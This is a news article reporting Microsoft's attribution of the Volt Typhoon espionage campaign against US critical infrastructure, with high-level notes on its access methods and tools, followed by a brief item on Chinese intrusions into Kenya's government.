Microsoft says it uncovered a cyber-espionage campaign aimed at critical infrastructure organizations in the United States. The tech giant has linked this malicious activity with “moderate confidence” to a China-linked state-backed threat actor it tracks as Volt Typhoon.
Active since at least mid-2021, the group is focused on espionage and information gathering and has been known to target critical infrastructure organizations in Guam and elsewhere in the US. As for the goal of the recent Volt Typhoon’ campaign, Microsoft believes it “is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.”
“In this campaign, the affected organizations span the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. Observed behavior suggests that the threat actor intends to perform espionage and maintain access without being detected for as long as possible,” the company said in a blog post.
Initial access to targeted organizations is achieved via internet-facing Fortinet FortiGuard devices, although it’s currently unclear how the threat actor has breached the devices in the first place. The group then attempts to obtain credentials to an Active Directory account used by the device and compromise other devices in the network.
The attacker proxies all its network traffic to its targets via compromised SOHO network edge devices, including ASUS, Cisco, D-Link, NETGEAR, and Zyxel products. This allows the threat actor to enhance the stealth of their operations and lowers overhead costs for acquiring infrastructure.
Once in the network, Volt Typhoon uses “living-off-the-land” tactics with hands-on-keyboard activity and living-off-the-land binaries (LOLBins) such as PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC).
The threat actor has also been observed using open-source tools, including Fast Reverse Proxy (frp), the Mimikatz credential-stealing tool, and the Impacket networking framework, according to a joint advisory published by the cybersecurity agencies from the US, Australia, New Zealand, the United Kingdom, and Canada.
Earlier this week, Reuters reported that Chinese hackers targeted the Kenyan government in an attempt to obtain information on the country's mounting debt owed to Beijing in a cyber-espionage operation spanning several years.
The report notes that between 2000 and 2020, China committed nearly $160 billion in loans to African countries. Kenya used over $9 billion in Chinese loans to fund an aggressive push to build or upgrade railways, ports and highways.
According to sources familiar with the matter, Chinese cyber intrusions began in late 2019 and continued to at least 2022, targeting the office of Kenya's president, its defense, information, health, land and interior ministries, its counter-terrorism center and other institutions.